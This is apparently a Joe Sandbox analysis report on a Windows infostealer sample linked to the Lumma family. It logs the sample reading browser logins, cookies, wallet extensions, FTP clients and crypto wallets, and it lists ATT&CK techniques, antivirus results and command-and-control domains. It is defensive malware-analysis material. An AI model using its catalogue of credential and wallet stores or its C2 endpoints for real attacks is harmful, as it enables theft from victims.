Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1400622014.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1401111547.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cFLK1CiiNK.exe PID: 3592, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: cFLK1CiiNK.exe PID: 3592, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count of matched signatures for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (12); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (44); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (851); Virtualization/Sandbox Evasion (44); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

Antivirus detection (sample)
Source | Detection | Scanner | Label
cFLK1CiiNK.exe | 58% | ReversingLabs | Win32.Trojan.Generic
cFLK1CiiNK.exe | 54% | Virustotal |
cFLK1CiiNK.exe | 100% | Avira | TR/Crypt.XPACK.Gen
cFLK1CiiNK.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Antivirus detection (URLs)
Source | Detection | Scanner | Label
https://mindhandru.buzz/ts | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/; | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/k | 100% | Avira URL Cloud | malware
https://mindhandru.buzz:443/apiz | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/mm | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/apib | 100% | Avira URL Cloud | malware
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mindhandru.buzz | 172.67.165.185 | true | false | | high

Domains and URLs from memory strings
Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
prisonyfork.buzz | false | | high
hummskitnj.buzz | false | | high
mindhandru.buzz | false | | high
https://mindhandru.buzz/api | false | | high
URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0 | cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/; | cFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/mm | cFLK1CiiNK.exe, 00000000.00000003.1324752204.00000000016A2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/apib | cFLK1CiiNK.exe, 00000000.00000003.1480191552.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482281782.00000000016E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/ | cFLK1CiiNK.exe, 00000000.00000003.1480463995.0000000005D3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/k | cFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/pi | cFLK1CiiNK.exe, 00000000.00000003.1424733515.000000000173D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/d | cFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz:443/api | cFLK1CiiNK.exe, 00000000.00000002.1484422809.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480463995.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1442422069.0000000005D42000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | cFLK1CiiNK.exe, 00000000.00000003.1424471508.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1324894763.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1401111547.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1400622014.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480579154.0000000001716000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480191552.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/ts | cFLK1CiiNK.exe, 00000000.00000003.1424733515.000000000173D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e | cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz:443/apiz | cFLK1CiiNK.exe, 00000000.00000003.1480579154.000000000171F000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482554233.000000000171F000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424471508.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta | cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.165.185 | mindhandru.buzz | United States | 13335 | CLOUDFLARENETUS | false
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581235
Start date and time: 2024-12-27 08:55:45 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cFLK1CiiNK.exe (renamed because the original name is a hash value)
Original Sample Name: a95fc73c07c7d57256de64b06e73a6cd.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200, 52.149.20.212
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target cFLK1CiiNK.exe, PID 3592 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Simulations
Time | Type | Description
02:56:44 | API Interceptor | 8x Sleep call for process: cFLK1CiiNK.exe modified
Match: 172.67.165.185
Associated Sample Name / URL | Detection | Threat Name
ZvHSpovhDw.exe | malicious | LummaC
PH1D3KHmOD.exe | malicious | LummaC
7jKx8dPOEs.exe | malicious | LummaC
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
zi042476Iv.exe | malicious | LummaC
U7TAniYFeK.exe | malicious | LummaC
ZBbOXn0a3R.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
P0SJULJxI0.exe | malicious | LummaC
r06aMlvVyM.exe | malicious | LummaC
i8Vwc7iOaG.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar
Match: mindhandru.buzz
Associated Sample Name / URL | Detection | Threat Name | Context
ZvHSpovhDw.exe | malicious | LummaC | 104.21.11.101
8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 104.21.11.101
ARoqFi68Nr.exe | malicious | LummaC | 104.21.11.101
Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
IERiUft8Wi.exe | malicious | LummaC | 104.21.11.101
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
zi042476Iv.exe | malicious | LummaC | 172.67.165.185
C8FtVPhuxd.exe | malicious | LummaC | 104.21.11.101
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
ZvHSpovhDw.exe | malicious | LummaC | 104.21.11.101
8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 104.21.11.101
ARoqFi68Nr.exe | malicious | LummaC | 104.21.11.101
DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar | 104.21.11.101
Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
